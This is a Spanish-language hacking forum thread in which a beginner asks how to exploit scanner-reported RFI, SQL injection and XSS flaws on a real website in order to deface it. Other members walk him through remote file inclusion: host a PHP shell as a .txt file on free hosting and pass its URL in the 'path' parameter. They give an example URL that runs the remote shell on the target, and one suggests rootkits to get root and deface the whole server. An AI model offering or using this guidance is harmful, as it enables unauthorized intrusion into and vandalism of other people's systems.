Help con la explotacion de estas "Vulnerabilidades"

[skullmaster-Back-]

bueno como estoy comenzando en este de los defacing, pues necesito vuestra ayuda, escanee una pagina web y me dio estas dos vulne.

Linkliste Index.PHP Multiple Remote File Include Vulnerabilities

y

phpMyQuote Index.PHP SQL Injection and Cross-Site Scripting Vulnerabilities

bueno a ver si me podian decir que exploit utilizar o que programa o cosa utilizar!XD igual estare buscando en internet! espero que me ayuden!

Salu2's!

[The Shadow]

weno man ... lo primero q te dice :

Linkliste Index.PHP Multiple Remote File Include Vulnerabilities

pos .... es vulnerable a atakes RFI ... si sabes usar esta tecnica usala .. sino ... busk info en la web

en cuanto a lo segundo :

phpMyQuote Index.PHP SQL Injection and Cross-Site Scripting Vulnerabilities

te dice q es vulnerable a atakes XSS ... = si sabes la tecnik .. usala ... sino ... busca en la web ..XD

PD: cualquier duda .... postea!

Saludos!

[skullmaster-Back-]

si grax conosco la segunda mas o menos y voy a buskr la de arriba!XD pero una cosa dice:

SQL Injection tambien eso significa que tambien es vulnerable a esta no??

Salu2's!

[ManCuerTex (ViPeR)]

si grax conosco la segunda mas o menos y voy a buskr la de arriba!XD pero una cosa dice:

SQL Injection tambien eso significa que tambien es vulnerable a esta no??

Salu2's!

Si.

La primera es sencilla de realizar, postea los pasos a seguir que haces y pon lo que no consigues.
En esta misma sección tienes manuales de estas 3 técnicas.


Saludos,

[skullmaster-Back-]

ok gracias, lei pero no encuentro la manera de hacerlo, lei aja de que se explotaba por ejemplo:

path?=

o algo asi, claro hay mas pero tengo una pregunta, se puede explotar de esta forma, osea si contiene esta manera:

si vamos a inicio me da: index.php
si vamos a otro lugar me da: modules.php?name=Content&pa=showpage&pid=13
y otro: modules.php?name=Downloads

alguna manera o es posible explotar esa vulnerabilidad desde estos puntos? tambien estoy localizando el XSS...........
pero segun tengo entendido y leido la primera es la mas facil, pero se me ha hecho imposible!XD bueno seguire leyendo e intentando y se me dan su ayuda, pues mejor!

Salu2's!

[ManCuerTex (ViPeR)]

A ver te explico.

La vulnerabilidad te dice que está en index.php en la variable path.

Tienes que hacerte con una shell, aquí en esta sección seguro que encuentras muchas shells o alguna recopilación de shells.
Cuando tengas una shell de sistema en php, la guardarás como un archivo .txt y la subes a un hosting gratuito que tengas, tipo lycos o algo parecido, hasta que obtengamos una URL que nos lleve a nuestra shell.

Algo como lycos.es/skullmaster/shell.txt

Entonces abriríamos la página index.php y en la variable path le meteriamos nuestra shell, ya que tiene un fallo de seguridad y nos permite inyectar páginas y código a través de esa variable.

Quedaría algo como:

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

www.lokesea.com/index.php?path=http://lycos.es/skullmaster123/tushell.txt?

Eso te ejecutará la shell en remoto y podrás realizar cualquier acción de sistema.
Pero seguramente tendrás permisos de usuario, y querrás ser root, pero bueno para defacear esa página, con esos permisos ya podrás.

Si mas adelante te animas a defacear el server entero que seguro que contiene muchas páginas, deberás utilizar algun rootkit para conseguir ser root.


SAludos,

[skullmaster-Back-]

grax ya lo de la cuenta lycos lo hice ayer, voy a ver lo de la shell!

Salu2's!

[[p3ll3]]

Para lo de remote file inclusion creo que  "el Perro"  o  "Socket"  habian dejado un post de como podias hacer un ataque de este tipo voy a ver si lo busco y te dejo el link.


Saludos............

[Th3 ziXâ„¢]

Para lo de remote file inclusion creo que  "el Perro"  o  "Socket"  habian dejado un post de como podias hacer un ataque de este tipo voy a ver si lo busco y te dejo el link.


Saludos............

Bueno me tome la molesta de buscarlo sea por ayudar


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

[[p3ll3]]

  ,eso es , esta bien !!!